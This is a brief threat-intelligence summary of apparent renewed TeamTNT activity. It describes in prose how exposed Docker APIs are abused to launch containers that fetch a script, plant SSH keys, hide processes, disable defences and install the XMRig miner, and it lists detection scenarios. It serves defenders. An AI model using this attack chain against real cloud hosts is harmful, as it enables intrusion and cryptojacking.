TeamTNT Resurfaces?

Category: Threat Actor Activity | Industry: N/A | Level: Tactical | Source: Trend Micro

Honeypot activity from Trend Micro researchers uncovers potentially new activity from threat group TeamTNT, a group that has commonly exploited cloud and container environments to deploy coinminers. Despite TeamTNT posting on their website on November 2021, stating the group has quit and ceased operations, recent activity mirrors techniques previously used the threat group. This leads to the potential the group has remained active or a copycat group has emerged, imitating tactics, techniques, and procedures (TTPs). Analysis of threat activity beings with exploiting misconfigured Docket APIs over TCP. From tracing the source of the requests, the IP addresses initiating the activity primarily originate from China with one German IP address observed. A review of the network traffic reveals the operators are utilizing the ZGrab network scanner based on the User-Agent field. When a successful response is received from an exposed endpoint, the threat actors initiate a request to "deploy an alpine-based container with instructions to download and execute the malicious shell script." The downloaded script contains many actions such as modifying system utilities, clearing cronjobs, configuring network settings, creating new services, adding the attacker's SSH keys to root directories, hiding processes, and disabling security settings such as firewall rules and bash history. The scripted activity ultimately led to the deployment of the XMRIG cryptocurrency miner with additional scripts downloaded to facilitate lateral movement.

Anvilogic Scenarios:

• Docker API Abuse & Container Created
• Unix File Download, Modified, Executed

Anvilogic Use Cases:

• Publicly exposed Docker API
• New Docker Container
• Rare shell script execution

‍